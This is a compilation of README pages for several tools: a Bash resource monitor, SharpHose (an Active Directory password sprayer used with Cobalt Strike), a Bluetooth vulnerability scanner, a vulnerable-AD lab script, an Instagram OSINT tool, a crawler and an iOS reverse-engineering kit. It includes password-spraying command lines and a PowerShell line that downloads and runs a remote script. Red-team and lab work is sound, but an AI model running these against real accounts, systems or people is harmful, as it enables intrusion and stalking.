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Bashtop - Linux/OSX/FreeBSD Resource Monitor


Bpytop, bashtop python port is now available at https://github.com/aristocratos/bpytop
It's a lot faster and about a third as cpu heavy and has more features, including:
  • Mouse support
  • Toggleable mini mode
  • More customization
  • Graphs for memory consumption
It's also a lot easier for me to bug fix and it's the project I'm actively working on, so please try to migrate to bpytop.

Resource monitor that shows usage and stats for processor, memory, disks, network and processes.

  • Easy to use, with a game inspired menu system.
  • Fast and "mostly" responsive UI with UP, DOWN keys process selection.
  • Function for showing detailed stats for selected process.
  • Ability to filter processes.
  • Easy switching between sorting options.
  • Send SIGTERM, SIGKILL, SIGINT to selected process.
  • UI menu for changing all config file options.
  • Auto scaling graph for network usage.
  • Shows message in menu if new version is available
  • Shows current read and write speeds for disks
  • Multiple data collection methods which can be switched if running on Linux

Bashtop now has theme support and a function to download missing local themes from repository.
See themes folder for available themes.
The builtin theme downloader places the default themes in $HOME/.config/bashtop/themes. User created themes should be placed in $HOME/.config/bashtop/user_themes to be safe from overwrites.
Let me know if you want to contribute with new themes.

Support and funding
Bug fixes and updates might be slow during normal workdays since I work full time as an industrial worker and don't have much time or energy left during the week. I'm looking into ways of funding this project that would allow me to take off time from my day job to work on this.
Any advice on how to get funding for open source projects is very welcome!

You can now sponsor this project through github, see my sponsors page for options.
Also added donation links for paypal and ko-fi.
Any support is greatly appreciated!


Mac Os X
Will not display correctly in the standard terminal! Recommended alternative iTerm2
Will also need to be run as superuser to display stats for processes not owned by user.

Linux, Mac Os X and FreeBSD
For correct display, a terminal with support for:
Also needs a UTF8 locale and a font that covers:
  • Unicode Block “Braille Patterns” U+2800 - U+28FF
  • Unicode Block “Geometric Shapes” U+25A0 - U+25FF
  • Unicode Block "Box Drawing" and "Block Elements" U+2500 - U+259F

Dropbear seems to not be able to set correct locale. So if accessing bashtop over ssh, OpenSSH is recommended.


Linux, OSX and FreeBSD
bash (v4.4 or later) Script functionality will most probably break with earlier versions. Bash version 5 is highly recommended to make use of $EPOCHREALTIME variable instead of a lot of external date command calls.
GNU coreutils
GNU sed

Linux using /proc for data collection
GNU grep
ps from procps-ng (v3.1.15 or later)
GNU awk

OSX and FreeBSD or Linux using psutil for data collection
Python3 (v3.6 or later)
psutil python module (v5.7.0 or later)

Optionals for additional stats
(Optional OSX) osx-cpu-temp Needed to show CPU temperatures.
(Optional Linux) lm-sensors Needed to show CPU temperatures.
(Optional Linux) iostat (part of sysstat) Needed if you want disk read/write stats and are not using psutil data collection.
(Optional OSX/Linux/FreeBSD) curl (v7.16.2 or later) Needed if you want messages about updates and the ability to download themes.

Main UI showing details for a selected process.

Main menu.

Options menu.


Dependencies installation OSX
Install homebrew if not already installed
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
If you got python 3.6 or later installed outside of brew:
sudo python3 -m ensurepip
sudo python3 -m pip install psutil
If you haven't got python3 installed:
brew install python3
python3 -m pip install psutil
Install dependencies
brew install bash coreutils gnu-sed git
Install optional dependency osx-cpu-temp
brew install osx-cpu-temp

Dependencies installation FreeBSD
Install with pkg and pip
sudo pkg install coreutils gsed git py37-psutil

Manual installation Linux, OSX and FreeBSD
Clone and install
git clone https://github.com/aristocratos/bashtop.git
cd bashtop
sudo make install
to uninstall it
sudo make uninstall

FreeBSD package
Available in FreeBSD ports
Install pre-built pacakge
sudo pkg install bashtop

Arch based
Available in the AUR as bashtop-git
Available in the Arch Linux repository as bashtop

Debian based
Available in official Debian repository since Debian 11
Available for debian/ubuntu from Azlux's repository
Or use quick installation:
Quick install go to DEB folder and type
 sudo ./build
to uninstall it go to DEB folder and type
 sudo ./build --remove

Guix based
Available in official Guix repository since 6bbd0fd2
guix install bashtop

Ubuntu based
Available in official Ubuntu repository since Ubuntu 20.10
Available for Ubuntu from PPA repository
Add PPA repository and install bashtop
 sudo add-apt-repository ppa:bashtop-monitor/bashtop
sudo apt update
sudo apt install bashtop

Available in the Fedora repository.
sudo dnf install bashtop

CentOS 8
dnf config-manager --set-enabled PowerTools
dnf install epel-release
dnf install bashtop

ARCH=$( /bin/arch )
subscription-manager repos --enable
dnf install epel-release
dnf install bashtop

All options changeable from within UI. Config files stored in "$HOME/.config/bashtop" folder

bashtop.cfg: (auto generated if not found)
#? Config file for bashtop v. 0.9.21

#* Color theme, looks for a .theme file in "$HOME/.config/bashtop/themes" and "$HOME/.config/bashtop/user_themes"
#* Should be prefixed with either "themes/" or "user_themes/" depending on location, "Default" for builtin default theme

#* Update time in milliseconds, increases automatically if set below internal loops processing time, recommended 2000 ms or above for better sample times for graphs

#* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive"
#* "cpu lazy" updates sorting over time, "cpu responsive" updates sorting directly
proc_sorting="cpu lazy"

#* Reverse sorting order, "true" or "false"

#* Show processes as a tree

#* Check cpu temperature, only works if "sensors", "vcgencmd" or "osx-cpu-temp" commands is available

#* Draw a clock at top of screen, formatting according to strftime, empty string to disable

#* Update main ui when menus are showing, set this to false if the menus is flickering too much for comfort

#* Custom cpu model name, empty string to disable

#* Enable error logging to "$HOME/.config/bashtop/error.log", "true" or "false"

#* Show color gradient in process list, "true" or "false"

#* If process cpu usage should be of the core it's running on or usage of the total available cpu power

#* Optional filter for shown disks, should be names of mountpoints, "root" replaces "/", separate multiple values with space

#* Enable check for new version from github.com/aristocratos/bashtop at start

#* Enable graphs with double the horizontal resolution, increases cpu usage

#* Enable the use of psutil python3 module for data collection, default on OSX

Command line options: (not yet implemented)
USAGE: bashtop

Might finish off items out of order since I usually work on multiple at a time.
  • Add options to change colors for text, graphs and meters.
  • Fix cross platform compatibility for Mac OSX and *BSD: Working on OSX, and FreeBSD.
  • Add support for showing AMD cpu temperatures.
  • Add option to show tree view of processes.
  • Add option to reset network download/upload totals.
  • Add option to turn of gradient in processes list.
  • Add gpu temp and usage. (If feasible)
  • Add io stats for disks.
  • Add cpu and mem stats for docker containers. (If feasible)
  • Change process list to line scroll instead of page change.
  • Add optional window for tailing log files.
  • Add options for resizing all boxes.
  • Add command line argument parsing.
  • Builtin updater. Relevant PR #96 by Jukoo
  • Add support for zram in memory box. Relevant PR #122 by perkinslr
  • Miscellaneous optimizations and code cleanup.
  • Add more commenting where it's sparse.
  • Python port. (Porting started)

SharpHose - Asynchronous Password Spraying Tool In C# For Windows Environments


SharpHose is a C# password spraying tool designed to be fast, safe, and usable over Cobalt Strike's execute-assembly. It provides a flexible way to interact with Active Directory using domain-joined and non-joined contexts, while also being able to target specific domains and domain controllers. SharpHose takes into consideration the domain password policy, including fine grained password policies, in an attempt to avoid account lockouts. Fine grained password policies are enumerated for the users and groups that that the policy applies to. If the policy applied also to groups, the group users are captured. All enabled domain users are then classified according to their password policies, in order of precedence, and marked as safe or unsafe. The remaining users are filtered against an optional user-supplied exclude list.
Besides just spraying, red team operators can view all of the password policies for a domain, all the users affected by the policy, or just view the enabled domain users. Output can be sent directly to the console or to a user-supplied output folder.
Follow me on Twitter for some more tool releases soon! @ustayready

Nozzles are built-in methods of spraying. While currently only supporting one Nozzle (LDAP), it's written in a way that makes it easily extendable.

Active Directory spraying nozzle using the LDAP protocol
  • Asynchronous spraying for faster, but not too fast, results
  • Domain joined and non-joined spraying
  • Tight integration w/ domain password policies and fine grained password policies
  • Smart lockout prevention (lockoutThreshold n-1 just to be safe)
  • Optionally spray to specific domains and domain controllers
  • View password policies and the affected users

Coming soon!
  • MSOL
  • Lync

  • Built using Visual Studio 2019 Community Edition
  • .NET Framework 4.5

Usage Examples
Cobalt Strike Users
Be sure to use the --auto to avoid the interactive prompts in SharpHose. Also, prepare your arguments locally so you can read the description before running. If you don't pass any arguments over execute-assembly, then SharpHose throws a "Missing Argument Exception" and Cobalt Strike won't return any output. You will know this is happening when you see [-] Invoke_3 on EntryPoint failed. This will be fixed eventually.
Domain Joined Spray w/o Interaction SharpHose.exe --action SPRAY_USERS --spraypassword Spring2020! --output c:\temp\ --auto
Domain Joined Spray w/ Exclusions SharpHose.exe --action SPRAY_USERS --spraypassword Spring2020! --output c:\temp\ --exclude c:\temp\exclusion_list.txt
Non-Domain Joined Spray SharpHose.exe --action SPRAY_USERS --spraypassword Spring2020! --domain lab.local --username demo --password DemoThePlanet --output c:\temp\
Domain Joined Show Policies Active Directory stores durations in negative large integer values which need to lapse after the last lockoutThreshold is exceeded. In future versions these will be formatted cleaner. SharpHose.exe --action GET_POLICIES --output c:\temp\
Domain Joined Show Policy Users SharpHose.exe --action GET_POLICY_USERS --policy lab --output c:\temp\
Domain Joined Show All Users SharpHose.exe --action GET_ENABLED_USERS --output c:\temp\
Domain Joined Spray Using Cobalt Strike execute-assembly /path/to/SharpHose.exe --action SPRAY_USERS --spraypassword Spring2020! --output c:\temp\ --auto


Bluescan - A Powerful Bluetooth Scanner For Scanning BR/LE Devices, LMP, SDP, GATT And Vulnerabilities!


Bluescan is a open source project by Sourcell Xu from DBAPP Security HatLab. Anyone may redistribute copies of bluescan to anyone under the terms stated in the GPL-3.0 license.

This document is also available in Chinese. See README-Chinese.md

Aren't the previous Bluetooth scanning tools scattered and in disrepair? So we have this powerful Bluetooth scanner based on modern Python 3 ---- bluescan.
When hacking new Bluetooth targets, the scanner can help us to collect intelligence, such as:
  • BR devices
  • LE devices
  • LMP features
  • GATT services
  • SDP services
  • Vulnerabilities (demo)

This tool is based on BlueZ, the official Linux Bluetooth stack. The following packages need to be installed:
sudo apt install libglib2.0-dev libbluetooth-dev
When you play this tool in a Linux virtual machine, making a USB Bluetooth adapter exclusive to it is recommended, like the Ostran Bluetooth USB Adapter OST-105 CSR 8150 v4.0 for 99 RMB. Of course, the best one to use is the little bit expensive Parani UD100-G03, 560 RMB. And if you want to try the vulnerability scanning, see README.md of ojasookert/CVE-2017-0785.

The lastest bluescan will be uploaded to PyPI, so the following command can install bluescan:
sudo pip3 install bluescan

$ bluescan -h  bluescan v0.2.1    A powerful Bluetooth scanner.    Author: Sourcell Xu from DBAPP Security HatLab.    License: GPL-3.0    Usage:      bluescan (-h | --help)      bluescan (-v | --version)      bluescan [-i <hcix>] -m br [--inquiry-len=<n>]      bluescan [-i <hcix>] -m lmp BD_ADDR      bluescan [-i <hcix>] -m sdp BD_ADDR      bluescan [-i <hcix>] -m le [--timeout=<sec>] [--le-scan-type=<type>] [--sort=<key>]      bluescan [-i <hcix>] -m gatt [--include-descriptor] --addr-type=<type> BD_ADDR      bluescan [-i <hcix>] -m vuln --addr-type=br BD_ADDR    Arguments:      BD_ADDR    Target Bluetooth device address    Options:      -h, --help                  Display this help.      -v, --version               Show the version.      -i <hcix>                   HCI device for scan. [default: hci0]      -m <mode>                   Scan mode, support BR, LE, LMP, SDP, GATT and vuln.      --inquiry-len=<n>           Inquiry_Length parameter of HCI_Inquiry command. [default: 8]      --timeout=<sec>             Duration of LE scan. [default: 10]      --le-scan-type=<type>       Active or passive scan for LE scan. [default: active]      --sort=<key>                Sort the discovered devices by key, only support RSSI now. [default: rssi]      --include-descriptor        Fetch descriptor information.      --addr-type=<type>          Public, random or BR.  

Scan BR devices -m br
Classic Bluetooth devices may use three technologies: BR (Basic Rate), EDR (Enhanced Data Rate), and AMP (Alternate MAC/PHY). Since they all belong to the Basic Rate system, so when scanning these devices we call them BR device scanning:

As shown above, through BR device scanning, we can get the address, page scan repetition mode, class of device, clock offset, RSSI, and the extended inquiry response (Name, TX power, and so on) of the surrounding classic Bluetooth devices.

Scan LE devices -m le
Bluetooth technology, in addition to the Basic Rate system, is Low Energy (LE) system. When scanning Bluetooth low energy devices, it is called LE device scanning:

As shown above, through LE device scanning, we can get the address, address type, connection status, RSSI, and GAP data of the surrounding LE devices.

Scan SDP services
Classic Bluetooth devices tell the outside world about their open services through SDP. After SDP scanning, we can get service records of the specified classic Bluetooth device:

You can try to connect to these services for further hacking.

Scan LMP features
Detecting the LMP features of classic Bluetooth devices allows us to judge the underlying security features of the classic Bluetooth device:

Scan GATT services
LE devices tell the outside world about their open services through GATT. After GATT scanning, we can get the GATT service of the specified LE device. You can try to read and write these GATT data for further hacking:

Vulnerabilities scanning (demo)
Vulnerability scanning is still in the demo stage, and currently only supports CVE-2017-0785:
$ sudo bluescan -m vuln --addr-type=br ??:??:??:??:??:??  ... ...  CVE-2017-0785  

Vulnerable-AD - Create A Vulnerable Active Directory That'S Allowing You To Test Most Of Active Directory Attacks In Local Lab


Create a vulnerable active directory that's allowing you to test most of active directory attacks in local lab.

Main Features
  • Randomize Attacks
  • Full Coverage of the mentioned attacks
  • you need run the script in DC with Active Directory installed
  • Some of attacks require client workstation

Supported Attacks
  • Abusing ACLs/ACEs
  • Kerberoasting
  • AS-REP Roasting
  • Abuse DnsAdmins
  • Password in AD User comment
  • Password Spraying
  • DCSync
  • Silver Ticket
  • Golden Ticket
  • Pass-the-Hash
  • Pass-the-Ticket
  • SMB Signing Disabled

# if you didn't install Active Directory yet , you can try 
Install-ADDSForest -CreateDnsDelegation:$false -DatabasePath "C:\\Windows\\NTDS" -DomainMode "7" -DomainName "cs.org" -DomainNetbiosName "cs" -ForestMode "7" -InstallDns:$true -LogPath "C:\\Windows\\NTDS" -NoRebootOnCompletion:$false -SysvolPath "C:\\Windows\\SYSVOL" -Force:$true
# if you already installed Active Directory, just run the script !
IEX((new-object net.webclient).downloadstring("https://raw.githubusercontent.com/wazehell/vulnerable-AD/master/vulnad.ps1"));
Invoke-VulnAD -UsersLimit 100 -DomainName "cs.org"

  • Add More realistic scenarios
  • Click close issue button on github

Osintgram - A OSINT Tool On Instagram


Osintgram is a OSINT tool on Instagram.

Osintgram offers an interactive shell to perform analysis on Instagram account of any users by its nickname. You can get:
- addrs           Get all registered addressed by target photos
- captions Get user's photos captions
- comments Get total comments of target's posts
- followers Get target followers
- followings Get users followed by target
- hashtags Get hashtags used by target
- info Get target info
- likes Get total likes of target's posts
- mediatype Get user's posts type (photo or video)
- photodes Get description of target's photos
- photos Download user's photos in output folder
- propic Download user's profile picture
- stories Download user's stories
- tagged Get list of users tagged by target
- target Set new target
- wcommented Get a list of user who commented target's photos
You can find detailed commands usage here.
Latest version | CHANGELOG

  1. Fork/Clone/Download this repo
    git clone https://github.com/Datalux/Osintgram.git
  2. Navigate to the directory
    cd Osintgram
  3. Run pip3 install -r requirements.txt
  4. Create a subdirectory config
    mkdir config
  5. Create in config folder the file: username.conf and write your Instagram account username
  6. Create in config folder the file: pw.conf and write your Instagram account password
  7. Run the main.py script
    python3 main.py <target username>

Run git pull in Osintgram directory

You can propose a feature request opening an issue or a pull request.

External library
Instagram API: https://github.com/ping/instagram_private_api

Urlgrab - A Golang Utility To Spider Through A Website Searching For Additional Links


A golang utility to spider through a website searching for additional links with support for JavaScript rendering.

go get -u github.com/iamstoxe/urlgrab

  • Customizable Parallelism
  • Ability to Render JavaScript (including Single Page Applications such as Angular and React)

Usage of urlgrab:
-cache-dir string
Specify a directory to utilize caching. Works between sessions as well.
Extremely verbose debugging output. Useful mainly for development.
-delay int
Milliseconds to randomly apply as a delay between requests. (default 2000)
-depth int
The maximum limit on the recursion depth of visited URLs. (default 2)
If true the browser will be displayed while crawling.
Note: Requires render-js flag
Note: Usage to show browser: --headless=false (default true)
Strip the query portion of the URL before determining if we've visited it yet.
Scrape pages with invalid SSL certificates
-js-timeout int
The amount of seconds before a request to render javascript should timeout. (default 10)
-json string
The filename where we should store the output JSON file.
-max-body int
The limit of the retrieved response body in kilobytes.
0 means unlimited.
Supply this value in kilobytes. (i.e. 10 * 1024kb = 10MB) (default 10240)
Do not send HEAD requests prior to GET for pre-validation.
-output-all string
The directory where we should store the output files.
-proxy string
The SOCKS5 proxy to utilize (format: socks5:// OR
Supply multiple proxies by separating them with a comma.
Utilize a random user agent string.
Determines if we utilize a headless chrome instance to render javascript.
-root-domain string
The root domain we should match links against.
If not specified it will default to the host of --url.
Example: --root-domain google.com
-threads int
The number of threads to utilize. (default 5)
-timeout int
The amount of seconds before a request should timeout. (default 10)
-url string
The URL where we should start crawling.
-urls string
A file path that contains a list of urls to supply as starting urls.
Requires --root-domain flag.
-user-agent string
A user agent such as (Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0).
Verbose output

Devin Stokes

Iblessing - An iOS Security Exploiting Toolkit, It Mainly Includes Application Information Collection, Static Analysis And Dynamic Analysis


  • iblessing is an iOS security exploiting toolkit, it mainly includes application information collection, static analysis and dynamic analysis.
  • iblessing is based on unicorn engine and capstone engine.

  • Cross-platform: Tested on macOS and Ubuntu.
  • iOS App static info extract, including metadata, deeplinks, urls, etc.
  • Mach-O parser and dyld symbol bind simulator
  • Objective-C class realizing and parsing
  • Scanners making dynamic analysis for arm64 assembly code and find key information or attack surface
  • Scanners using unicorn to partially simulate Mach-O arm64 code execution and find some features
  • Generators that can provide secondary processing on scanner's report to start a query server, or generate script for IDA
  • Super objc_msgSend Xrefs Scanner
    • objc method and subs (such as block) emulation to generate xrefs like flare-emu
    • objc function wrapper detect and ida usercall generate
    • objc_msgSend sub functions analysis
    • objc block to objc_msgSend xrefs in args and capture list
    • report format including json, etc.
  • Diagnostic logs
  • Tests
  • More flexible scanner infrastructure for new scanner plugins
  • Swift class and method parsing
  • More scanners and generators
  • Cross-platform

unicorn may crash (segment fault or bus error) on some computers, I am trying to solve this problem.If you encounter any problems, you can contact me, thank you
In case you need support regarding iblessing or anything associated with it, you can:
  • create an issue and provide necessary information
  • contact Sou1gh0st on Twitter
  • send mail to xiuyutong1994#163.com
  • send mail to xiuyutong1994#gmail.com

  • 2020.08.11 - Now iblessing is a cross-platform tool, support both macOS and Linux
  • 2020.08.08 - Improve objc_msgSend xref scanner, add sub xref supoort, including block arguments and capture list
  • 2020.07.30 - Improve symbol-wrapper scanner, and add ida scripts for symbol wrapper rename and prototype modification
  • 2020.07.21 - First release

Get started
Sometimes unicorn will crash on start when doing huge memory mapping, you can try to run it again, if it still can't work, please contact me or create an issue, thanks.
  1. You can download the pre-released iblessing binary and enjoy it.
  2. run chmod +x for the binary
  3. For more tutorails, please check the Documentation & Help below.

How to Build

  • Platform: macOS, Linux
To get started compiling iblessing, please follow the steps below:
git clone --recursive -j4 https://github.com/Soulghost/iblessing
cd iblessing

  • Platform: macOS
To get started compiling iblessing, please follow the steps below:
git clone --recursive -j4 https://github.com/Soulghost/iblessing
cd iblessing

If there are any errors, you can manully compile capstone and unicorn, then drag libcapstone.a and libunicorn.a to the Xcode project's vendor/libs.
If all of this run successfully, you can find the binary in build directory:
> ls ./build

> file ./build/iblessing
./build/iblessing: Mach-O 64-bit executable x86_64

Documentation & Help

$ iblessing -h

██╗██████╗ ██╗ ███████╗███████╗███████╗██╗███╗ ██╗ ██████╗
██║██╔══██╗██║ ██╔════╝██╔════╝██╔════╝██║████╗ ██║██╔════╝
██║██████╔╝██║ █████╗ ███████╗███████╗██║██╔██╗ ██║██║ ███╗
██║██╔══██╗██║ ██╔══╝ ╚════██║╚════██║██║██║╚██╗██║██║ ██║
██║██████╔╝███████╗███████╗███████║███████║██║██║ ╚████║╚██████╔╝
╚═╝╚═════╝ ╚══════╝╚══════╝╚══════╝╚══════╝╚═╝╚═╝ ╚═══╝ ╚═════╝

[***] iblessing iOS Security Exploiting Toolkit Beta 0.1.1 (http://blog.asm.im)
[***] Author: Soulghost (高级页面仔) @ (https://github.com/Soulghost)

Usage: iblessing [options...]
-m, --mode mode selection:
* scan: use scanner
* generator: use generator
-i, --identifier choose module by identifier:
* <scanner-id>: use specific scanner
* <generator-id>: use specific generator
-f, --file input file path
-o, --output output file path
-l, --list list available scanners
-d, --data extra data
-h, --help Shows this page

Basic Concepts

A scanner is a component used to output analysis report through static and dynamic analysis of binary files, for example, the objc-msg-xref scanner can dynamiclly analyze most objc_msgSend cross references.
[*] Scanner List:
- app-info: extract app infos
- objc-class-xref: scan for class xrefs
- objc-msg-xref: generate objc_msgSend xrefs record
- predicate: scan for NSPredicate xrefs and sql injection surfaces
- symbol-wrapper: detect symbol wrappers

A generator is a component that performs secondary processing on the report generated by the scanner, for example, it can generate IDA scripts based on the the objc-msg-xref scanner's cross references report.
[*] Generator List:
- ida-objc-msg-xref: generator ida scripts to add objc_msgSend xrefs from objc-msg-xref scanner's report
- objc-msg-xref-server: server to query objc-msg xrefs
- objc-msg-xref-statistic: statistics among objc-msg-send reports

Basic Usage

Scan for AppInfos
> iblessing -m scan -i app-info -f <path-to-app-bundle>
Let's take WeChat as an example:
> iblessing -m scan -i app-info -f WeChat.app
[*] set output path to /opt/one-btn/tmp/apps/WeChat/Payload
[*] input file is WeChat.app
[*] start App Info Scanner
[+] find default plist file Info.plist!
[*] find version info: Name: 微信(WeChat)
Version: 7.0.14(18E226)
ExecutableName: WeChat
[*] Bundle Identifier: com.tencent.xin
[*] the app allows HTTP requests **without** exception domains!
[+] find app deeplinks
|-- wechat://
|-- weixin://
|-- fb290293790992170://
|-- weixinapp://
|-- prefs://
|-- wexinVideoAPI://
|-- QQ41C152CF://
|-- wx703://
|-- weixinULAPI://
[*] find app callout whitelist
|-- qqnews://
|-- weixinbeta://
|-- qqnewshd://
|-- qqmail://
|-- whatsapp://
|-- wxwork://
|-- wxworklocal://
|-- wxcphonebook://
|-- mttbrowser://
|-- mqqapi://
|-- mqzonev2://
|-- qqmusic://
|-- tenvideo2://
[+] find 507403 string literals in binary
[*] process with string literals, this maybe take some time
[+] find self deeplinks URLs:
|-- weixin://opennativeurl/devicerankview
|-- weixin://dl/offlinepay/?appid=%@
|-- weixin://opennativeurl/rankmyhomepage
[+] find other deeplinks URLs:
|-- wxpay://f2f/f2fdetail
|-- file://%@?lang=%@&fontRatio=%.2f&scene=%u&version=%u&type=%llu&%@=%d&qqFaceFolderPath=%@&platform=iOS&netType=%@&query=%@&searchId=%@&isHomePage=%d&isWeAppMore=%d&subType=%u&extParams=%@&%@=%@&%@=%@
[*] write report to path /opt/one-btn/tmp/apps/WeChat/Payload/WeChat.app_info.iblessing.txt

> ls -alh
-rw-r--r--@ 1 soulghost wheel 29K Jul 23 14:01 WeChat.app_info.iblessing.txt

Scan for Class XREFs
Notice: ARM64 Binaries Only
iblessing -m scan -i objc-class-xref -f <path-to-binary> -d 'classes=<classname_to_scan>,<classname_to_scan>,...'
> restore-symbol WeChat -o WeChat.restored
> iblessing -m scan -i objc-class-xref -f WeChat.restored -d 'classes=NSPredicate'
[*] set output path to /opt/one-btn/tmp/apps/WeChat/Payload
[*] input file is WeChat
[+] detect mach-o header 64
[+] detect litten-endian
[*] start Objc Class Xref Scanner
[*] try to find _OBJC_CLASS_$_NSPredicate
[*] Step 1. locate class refs
[+] find _OBJC_CLASS_$_NSPredicate at 0x108eb81d8
[*] Step 2. find __TEXT,__text
[+] find __TEXT,__text at 0x4000
[*] Step 3. scan in __text
[*] start disassembler at 0x100004000
[*] \ 0x1002e1a50/0x1069d9874 (2.71%) [+] find _OBJC_CLASS_$_NSPredicate ref at 0x1002e1a54
[*] Step 4. symbolicate ref addresses
[+] _OBJC_CLASS_$_NSPredicate -|
[+] find _OBJC_CLASS_$_NSPredicate ref -[WCW atchNotificationMgr addYoCount:contact:type:] at 0x1002e1a54
[+] find _OBJC_CLASS_$_NSPredicate ref -[NotificationActionsMgr handleSendMsgResp:] at 0x1003e0e28
[+] find _OBJC_CLASS_$_NSPredicate ref -[FLEXClassesTableViewController searchBar:textDidChange:] at 0x1004a090c
[+] find _OBJC_CLASS_$_NSPredicate ref +[GameCenterUtil parameterValueForKey:fromQueryItems:] at 0x1005a823c
[+] find _OBJC_CLASS_$_NSPredicate ref +[GameCenterUtil getNavigationBarColorForUrl:defaultColor:] at 0x1005a8cd8

Scan for All objc_msgSend XREFs
Notice: ARM64 Binaries Only

Simple Mode
iblessing -m scan -i objc-msg-xref -f <path-to-binary>

Anti-Wrapper Mode
iblessing -m scan -i objc-msg-xref -f WeChat -d 'antiWrapper=1'
The anti-wrapper mode will detect objc_msgSend wrappers and make transforms, such as:
; __int64 __usercall objc_msgSend_X0_X22_X20@<X0>(void *obj@<X0>, const char *sel@<X22>, id anyObj@<X20>, ...)  objc_msgSend_X0_X22_X20:  MOV             X1, X22  MOV             X2, X20  B               objc_msgSend  

Usage Example:
; __int64 __usercall objc_msgSend_X0_X22_X20@<X0>(void *obj@<X0>, const char *sel@<X22>, id anyObj@<X20>, ...)
MOV X1, X22
MOV X2, X20
B objc_msgSend
The report can be used by the generators, now let's go.

Generate objc_msgSend Xrefs Query Server
You can start a server through iblessing's objc-msg-xref-server generator to query all objc_msgSend xrefs.
> iblessing -m scan -i objc-msg-xref -f WeChat -d 'antiWrapper=1'
[*] set output path to /opt/one-btn/tmp/apps/WeChat/Payload
[*] input file is WeChat
[+] detect mach-o header 64
[+] detect litten-endian

[*] !!! Notice: enter anti-wrapper mode, start anti-wrapper scanner
[*] start Symbol Wrapper Scanner
[*] try to find wrappers for_objc_msgSend
[*] Step1. find __TEXT,__text
[+] find __TEXT,__text at 0x100004000
[+] mapping text segment 0x100000000 ~ 0x107cb0000 to unicorn engine
[*] Step 2. scan in __text
[*] start disassembler at 0x100004000
[*] / 0x1069d986c/0x1069d9874 (100.00%)
[*] reach to end of __text, stop
[+] anti-wrapper finished

[*] start ObjcMethodXrefScanner Exploit Scanner
[*] Step 1. realize all app classes
[*] realize classes 14631/14631 (100.00%)
[+] get 667318 methods to analyze
[*] Step 2. dyld load non-lazy symbols
[*] Step 3. track al l calls
[*] progress: 667318 / 667318 (100.00%)
[*] Step 4. serialize call chains to file
[*] saved to /opt/one-btn/tmp/apps/WeChat/Payload/WeChat_method-xrefs.iblessing.txt

> ls -alh WeChat_method-xrefs.iblessing.txt
-rw-r--r-- 1 soulghost wheel 63M Jul 23 14:46 WeChat_method-xrefs.iblessing.txt

> head WeChat_method-xrefs.iblessing.txt
iblessing methodchains,ver:0.2;
182360,0x1008a0ab8,+[A8KeyControl initialize],+,A8KeyControl,initialize,[],[4429#0x1008a1064@4376#0x1008a1050@13769#0x1008a10d0]
182343,0x1008a0ad0,+[A8KeyControl_QueryStringTransferCookie initialize],+,A8KeyControl_QueryStringTransferCookie,initialize,[],[4429#0x1008a1064@4376#0x1008a1050@13769#0x1008a10d0]
145393,0x1008c2220,+[A8KeyResultCookieWriter initWithDomain:weakWebView:andCompleteBlock:],+,A8KeyResultCookieWriter,initWithDomain:weakWebView:andCompleteBlock:,[145386#0x1003636 7c],[]
145396,0x1008c3df8,+[A8KeyResultCookieWriter setA8KeyCookieExpireTime:],+,A8KeyResultCookieWriter,setA8KeyCookieExpireTime:,[145386#0x1003636e8],[]
145397,0x1008c27e8,+[A8KeyResultCookieWriter writeCompleteMarkerCookieValue:forKey:],+,A8KeyResultCookieWriter,writeCompleteMarkerCookieValue:forKey:,[145386#0x10036380c],[]
253456,0x0,+[AAOperationReq init],+,AAOperationReq,init,[253455#0x1039a9d30],[]
253457,0x0,+[AAOperationReq setBaseRequest:],+,AAOperationReq,setBaseRequest:,[253455#0x1039a9d8c],[]
186847,0x0,+[AAOperationRes length],+,AAOperationRes,length,[186845#0x10342aa54],[]

Specify the Listening Host and Port
The default listening address is, you can specify it by -d option.
iblessing -m generator -i objc-msg-xref-server -f <path-to-report-generated-by-objc-msg-xref-scanner>

Usage Example
Notice: the objc-msg-xref is based on unicorn, to speed up the analyze, we do not follow any calls, so the result is partially missing.
iblessing -m generator -i objc-msg-xref-server -f WeChat_method-xrefs.iblessing.txt -d 'host=;port=12345'
Next you can open with a browser to query any objc_msgSend xrefs you like:

Generate IDA Scripts for objc_msgSend xrefs
You can add objc_msgSend xrefs generated from objc-msg-xref scanner to make your reverse engineering journey more faster and comfortable.
> iblessing -m generator -i objc-msg-xref-server -f WeChat_method-xrefs.iblessing.txt
[*] set output path to /opt/one-btn/tmp/apps/WeChat/Payload
[*] input file is WeChat_method-xrefs.iblessing.txt
[*] start ObjcMsgXREFServerGenerator
[*] load method-chain db for version iblessing methodchains,ver:0.2;
[*] table keys chainId,sel,prefix,className,methodName,prevMethods,nextMethods
[-] bad line 104467,0x0,+[TPLock P, ],+,TPLock,P, ,[104426#0x1043b9904],[]
[-] bad line 114905,0x0,?[0x108ce1578 (,],?,0x108ce1578,(,,[114900#0x1011e8c68],[]
[-] bad line 104464,0x0,?[? P, ],?,?,P, ,[104426#0x1043b98a8],[]
[-] bad line 139234,0x0,?[? X
[-] bad line ],?,?,X
[-] bad line ,[139205#0x1013c222c],[]
[+] load storage from disk succeeded!
[*] listening on

Usage Example
Notice: the objc-msg-xref is based on unicorn, to speed up the analyze, we do not follow any calls, so the result is partially missing.
iblessing -m generator -i ida-objc-msg-xref -f <path-to-report-generated-by-objc-msg-xref-scanner>
Next open your IDA -> File -> Script File and load the script, this step may take a long time. And when it is done, you can find many xrefs for objc method:

Scan for symbol wrappers
A Mach-O file may contain multiple wrappers of commonly used dynamic library imported symbols, such as:
__text:00000001003842D8 sub_1003842CC                           ; CODE XREF: -[BDARVLynxTracker eventV3:params:adExtraData:]+168↑p  __text:00000001003842D8                                         ; -[BDARVLynxTracker eventV3:params:adExtraData:]+214↑p ...  __text:00000001003842D8                 MOV             X1, X27  __text:00000001003842DC                 MOV             X2, X19  __text:00000001003842E0                 B               objc_msgSend  
We can convert the wrapper by usercall:
__text:00000001003842CC ; id __usercall objc_msgSend_61@<X0>(id@<X23>, const char *@<X28>, ...)  __text:00000001003842CC _objc_msgSend_61                        ; CODE XREF: -[BDARVLynxTracker eventV3:params:adExtraData:]+2CC↑p  __text:00000001003842CC                                         ; -[BDARVLynxTracker eventV3:params:adExtraData:]+320↑p ...  __text:00000001003842CC                 MOV             X0, X23  __text:00000001003842D0                 MOV             X1, X28  __text:00000001003842D4                 B               objc_msgSend  
